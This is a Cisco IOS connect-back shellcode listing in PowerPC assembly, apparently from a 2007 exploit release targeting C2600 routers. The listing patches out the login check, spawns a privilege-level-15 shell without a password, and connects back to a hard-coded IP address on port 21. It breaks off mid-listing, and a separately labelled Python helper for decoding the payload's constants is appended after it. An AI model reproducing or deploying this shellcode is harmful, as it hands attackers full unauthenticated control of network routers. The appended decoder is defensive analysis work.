# ----------------------------------------------------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21.
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------

main:
        stwu 1,-48(1)
        mflr 0
        stw 31,44(1)
        stw 0,52(1)
        mr 31,1
        li 3,512
        lis 9,malloc@ha                 # malloc() memory for tcp structure
        la 9,malloc@l(9)
        mtctr 9
        bctrl
        mr 0,3
        stw 0,20(31)
        lwz 9,12(31)
        li 0,1
        stb 0,0(9)
        lwz 9,12(31)
        lis 0,0xac1e                    # connect back ip address (high 16 bits)
        ori 0,0,1018                    # low 16 bits of the connect back ip address
# Page 1/3
# Cisco IOS Connectback shellcode v1.0
# Gyan Chawdhary
# 08/13/2008
        stw 0,4(9)
        li 3,66
        li 4,0
        lis 9,allocate_tty@ha           # allocate new TTY
        la 9,allocate_tty@l(9)
        mtctr 9
        bctrl
        addi 0,31,24

# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################

# login patch begin
        lis 9, login@ha
        la 9, login@l(9)
        li 8,0
        stw 8, 0(9)
# login patch end

#IDA placeholder for con0
#
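Added example, not part of the original listing or the author's code: a small Python helper a responder can run over a PowerPC listing like the one above to recover the 32-bit constants that `lis`/`ori` and `lis`/`addi` pairs assemble, and so read the hard-coded connect-back address out of a payload without assembling or executing it. It assumes GNU as-style numeric operands as written above; the two-line sample input is copied from the listing.

```python
"""Recover 32-bit constants materialised by PowerPC lis/ori or lis/addi pairs."""
import re
import socket
import struct

# Matches e.g. "lis 0,0xac1e", "ori 0,0,1018", "addi 3,3,-31284" (comments stripped first).
# Symbolic operands such as "malloc@ha" deliberately do not match.
_INSN = re.compile(
    r"^\s*(lis|ori|addi)\s+(\d+)\s*,\s*(?:(\d+)\s*,\s*)?(-?0x[0-9a-fA-F]+|-?\d+)\s*$"
)


def recover_constants(listing: str) -> dict[int, int]:
    """Return {register: value} for each register whose value is completed by an
    `ori`/`addi` on the same register after a `lis`.  A register written by some
    other instruction in between is not invalidated; this is a listing-level aid,
    not an emulator, so check hits against the surrounding code."""
    pending = {}   # register -> high half loaded by lis, awaiting its low half
    found = {}
    for line in listing.splitlines():
        m = _INSN.match(line.split("#", 1)[0])
        if not m:
            continue
        op, rd, ra, imm = m.group(1), int(m.group(2)), m.group(3), int(m.group(4), 0)
        if op == "lis":
            pending[rd] = (imm & 0xFFFF) << 16
        elif rd in pending and ra is not None and int(ra) == rd:
            if op == "ori":                       # ori ORs a zero-extended immediate
                found[rd] = pending.pop(rd) | (imm & 0xFFFF)
            else:                                 # addi adds a sign-extended immediate
                found[rd] = (pending.pop(rd) + imm) & 0xFFFFFFFF
    return found


def as_ipv4(value: int) -> str:
    """Render a 32-bit constant as a dotted quad (network byte order)."""
    return socket.inet_ntoa(struct.pack(">I", value))


# Constructed sample: the two instructions from the listing that build the address.
SAMPLE = """
        lis 0,0xac1e                    # connect back ip address (high 16 bits)
        ori 0,0,1018                    # low 16 bits of the connect back ip address
"""

if __name__ == "__main__":
    for reg, val in recover_constants(SAMPLE).items():
        print(f"r{reg} = 0x{val:08x} -> {as_ipv4(val)}")
```

The same helper also decodes the `@ha`/`@l` idiom once the linker has resolved it to numbers, e.g. `lis 3,0x8048` followed by `addi 3,3,-31284` yields the listing's `malloc` address 0x804785CC.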